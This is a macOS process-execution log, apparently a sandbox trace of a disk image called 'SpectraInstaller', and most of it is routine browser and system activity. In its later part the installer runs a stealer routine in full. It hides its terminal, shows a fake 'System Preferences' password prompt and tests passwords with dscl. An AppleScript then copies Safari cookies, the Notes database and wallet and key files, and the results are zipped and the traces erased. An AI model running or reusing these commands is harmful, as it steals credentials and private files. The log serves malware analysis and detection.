"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=119"
1⤵
PID:563

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=119"
1⤵
PID:564

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=119"
1⤵
PID:565

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=120"
1⤵
PID:566

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=29" "--launch-time-ticks=412295940" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=120"
1⤵
PID:567

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=120"
1⤵
PID:568

/usr/libexec/xpcproxy
xpcproxy com.apple.CryptoTokenKit.setoken 313
1⤵
PID:569

/System/Library/Frameworks/CryptoTokenKit.framework/PlugIns/setoken.appex/Contents/MacOS/setoken
/System/Library/Frameworks/CryptoTokenKit.framework/PlugIns/setoken.appex/Contents/MacOS/setoken
1⤵
PID:569

/usr/libexec/xpcproxy
xpcproxy com.apple.appkit.xpc.openAndSavePanelService 486
1⤵
PID:570

/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/com.apple.appkit.xpc.openAndSavePanelService.xpc/Contents/MacOS/com.apple.appkit.xpc.openAndSavePanelService
/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/com.apple.appkit.xpc.openAndSavePanelService.xpc/Contents/MacOS/com.apple.appkit.xpc.openAndSavePanelService
1⤵
PID:570

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.QuickLookUIService 570
1⤵
PID:571

/System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/XPCServices/QuickLookUIService.xpc/Contents/MacOS/QuickLookUIService
/System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/XPCServices/QuickLookUIService.xpc/Contents/MacOS/QuickLookUIService
1⤵
PID:571

/usr/libexec/xpcproxy
xpcproxy com.apple.automountd
1⤵
PID:572

/usr/libexec/automountd
automountd
1⤵
PID:572

/usr/libexec/od_user_homes
/usr/libexec/od_user_homes .localized
2⤵
PID:573

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=119"
1⤵
PID:576

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=120"
1⤵
PID:577

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=92"
1⤵
PID:578

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=92"
1⤵
PID:579

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=35" "--launch-time-ticks=487657966" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=92"
1⤵
PID:580

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=chrome.mojom.FileUtilService" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=92"
1⤵
PID:581

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:583

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:583

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:584

/usr/libexec/xpcproxy
xpcproxy com.apple.DiskImageMounter.2136
1⤵
PID:585

/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter
/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter
1⤵
PID:585

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:586

/usr/libexec/xpcproxy
xpcproxy com.apple.hdiejectd
1⤵
PID:587

/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd
1⤵
PID:587

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:584

/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 092BA010-B2AE-4F4E-BF06-E976B1855B0E
1⤵
PID:588

/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 092BA010-B2AE-4F4E-BF06-E976B1855B0E -post-exec 4
1⤵
PID:589

/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/Resources/DiskImages UI Agent.app/Contents/MacOS/DiskImages UI Agent
"/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/Resources/DiskImages UI Agent.app/Contents/MacOS/DiskImages UI Agent" 092BA010-B2AE-4F4E-BF06-E976B1855B0E
1⤵
PID:590

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
1⤵
PID:592

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
1⤵
PID:593

/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
1⤵
PID:594

/sbin/fsck_hfs
/sbin/fsck_hfs -f -n /dev/disk3s1
1⤵
PID:595

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
1⤵
PID:596

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
1⤵
PID:597

/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
1⤵
PID:598

/sbin/mount
/sbin/mount -t hfs -o "-u=502,-g=20,-m=755,nodev,noowners,nosuid,rdonly,quarantine" /dev/disk3s1 /Volumes/SpectraInstaller
1⤵
PID:599

/sbin/mount_hfs
/sbin/mount_hfs -u 502 -g 20 -m 755 -o nodev -o noowners -o nosuid -o rdonly -o quarantine /dev/disk3s1 /Volumes/SpectraInstaller
2⤵
PID:600

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.2028
1⤵
PID:602

/Applications/Safari.app/Contents/MacOS/Safari
/Applications/Safari.app/Contents/MacOS/Safari
1⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.History
1⤵
PID:603

/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
1⤵
PID:603

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.D04D067F-D7FE-4AB1-8E46-00955818F846 602
1⤵
PID:604

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:604

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:606

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:606

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.53A75EFB-04DD-4890-B186-31B4D62EADE6 602
1⤵
PID:609

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:609

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=92"
1⤵
PID:610

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
1⤵
PID:611

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
1⤵
PID:611

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000001.Terminal
1⤵
PID:612

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal -psn_0_208947
1⤵
PID:612

/usr/bin/login
login -pf run
2⤵
PID:614

/bin/zsh
-zsh
3⤵
PID:616

/usr/libexec/path_helper
/usr/libexec/path_helper -s
4⤵
PID:617

/usr/bin/locale
locale LC_CTYPE
4⤵
PID:618

/usr/bin/login
login -pf run
2⤵
PID:615

/bin/zsh
-zsh
3⤵
PID:619

/usr/libexec/path_helper
/usr/libexec/path_helper -s
4⤵
PID:620

/usr/bin/locale
locale LC_CTYPE
4⤵
PID:621

/Volumes/SpectraInstaller/SpectraInstaller
/Volumes/SpectraInstaller/SpectraInstaller
4⤵
PID:622

/usr/libexec/xpcproxy
xpcproxy com.apple.XprotectFramework.AnalysisService 496
1⤵
PID:613

/System/Library/PrivateFrameworks/XprotectFramework.framework/Versions/A/XPCServices/XprotectService.xpc/Contents/MacOS/XprotectService
/System/Library/PrivateFrameworks/XprotectFramework.framework/Versions/A/XPCServices/XprotectService.xpc/Contents/MacOS/XprotectService
1⤵
PID:613

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:623

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:623

/usr/bin/osascript
osascript -e "tell application \"Terminal\" to set visible of front window to false"
1⤵
PID:623

/bin/sh
sh -c "mkdir /Users/run/875375388"
1⤵
PID:624

/bin/bash
sh -c "mkdir /Users/run/875375388"
1⤵
PID:624

/bin/mkdir
mkdir /Users/run/875375388
1⤵
PID:624

/bin/sh
sh -c sw_vers
1⤵
PID:625

/bin/bash
sh -c sw_vers
1⤵
PID:625

/usr/bin/sw_vers
sw_vers
1⤵
PID:625

/bin/sh
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:626

/bin/bash
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:626

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:626

/bin/sh
sh -c "system_profiler SPDisplaysDataType"
1⤵
PID:628

/bin/bash
sh -c "system_profiler SPDisplaysDataType"
1⤵
PID:628

/usr/sbin/system_profiler
system_profiler SPDisplaysDataType
1⤵
PID:628

/bin/sh
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:630

/bin/bash
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:630

/usr/bin/dscl
dscl /Local/Default -authonly run
1⤵
PID:630

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:631

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:631

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:631

/bin/sh
sh -c /usr/sbin/kextstat
1⤵
PID:632

/bin/bash
sh -c /usr/sbin/kextstat
1⤵
PID:632

/usr/sbin/kextstat
/usr/sbin/kextstat
1⤵
PID:632

/bin/sh
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:633

/bin/bash
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:633

/usr/bin/dscl
dscl /Local/Default -authonly run root
1⤵
PID:633

/bin/sh
sh -c "mkdir -p '/Users/run/875375388/Chromium/Chrome'"
1⤵
PID:634

/bin/bash
sh -c "mkdir -p '/Users/run/875375388/Chromium/Chrome'"
1⤵
PID:634

/bin/mkdir
mkdir -p /Users/run/875375388/Chromium/Chrome
1⤵
PID:634

/bin/sh
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"875375388\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"875375388:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
1⤵
PID:635

/bin/bash
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"875375388\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"875375388:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
1⤵
PID:635

/usr/bin/osascript
osascript -e "set baseFolderPath to (path to home folder as text) & \"875375388\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"875375388:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
1⤵
PID:635

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.C2099BDF-CEBA-4F23-93D6-9BDE5ABB6D75
1⤵
PID:640

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:640

/bin/sh
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/875375388 /Users/run/875375388.zip --norsrc --noextattr"
1⤵
PID:641

/bin/bash
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/875375388 /Users/run/875375388.zip --norsrc --noextattr"
1⤵
PID:641

/usr/bin/ditto
ditto -c -k --sequesterRsrc --keepParent /Users/run/875375388 /Users/run/875375388.zip --norsrc --noextattr
1⤵
PID:641

/bin/sh
sh -c "rm -rf /Users/run/875375388"
1⤵
PID:642

/bin/bash
sh -c "rm -rf /Users/run/875375388"
1⤵
PID:642

/bin/rm
rm -rf /Users/run/875375388
1⤵
PID:642

/bin/sh
sh -c "rm /Users/run/875375388.zip"
1⤵
PID:643

/bin/bash
sh -c "rm /Users/run/875375388.zip"
1⤵
PID:643

/bin/rm
rm /Users/run/875375388.zip
1⤵
PID:643

/bin/sh
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
1⤵
PID:644

/bin/bash
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
1⤵
PID:644

/usr/bin/osascript
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
1⤵
PID:644

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:646

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:646

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.SearchHelper 602
1⤵
PID:648

/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.SearchHelper.xpc/Contents/MacOS/com.apple.Safari.SearchHelper
/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.SearchHelper.xpc/Contents/MacOS/com.apple.Safari.SearchHelper
1⤵
PID:648

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.SafeBrowsing.Service
1⤵
PID:649

/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service
/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service
1⤵
PID:649

/usr/libexec/xpcproxy
xpcproxy com.apple.accessibility.mediaaccessibilityd
1⤵
PID:650

/System/Library/Frameworks/MediaAccessibility.framework/Versions/A/XPCServices/com.apple.accessibility.mediaaccessibilityd.xpc/Contents/MacOS/com.apple.accessibility.mediaaccessibilityd
/System/Library/Frameworks/MediaAccessibility.framework/Versions/A/XPCServices/com.apple.accessibility.mediaaccessibilityd.xpc/Contents/MacOS/com.apple.accessibility.mediaaccessibilityd
1⤵
PID:650

/usr/libexec/xpcproxy
xpcproxy com.apple.coremedia.videodecoder 609
1⤵
PID:651

/System/Library/Frameworks/VideoToolbox.framework/Versions/A/XPCServices/VTDecoderXPCService.xpc/Contents/MacOS/VTDecoderXPCService
/System/Library/Frameworks/VideoToolbox.framework/Versions/A/XPCServices/VTDecoderXPCService.xpc/Contents/MacOS/VTDecoderXPCService
1⤵
PID:651

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.26C34A72-1940-4120-AA23-6BED6485372B 602
1⤵
PID:653

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:653

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=120"
1⤵
PID:654

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,6132170210615979957,4367879289815383070,131072" "--seatbelt-client=120"
1⤵
PID:655

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
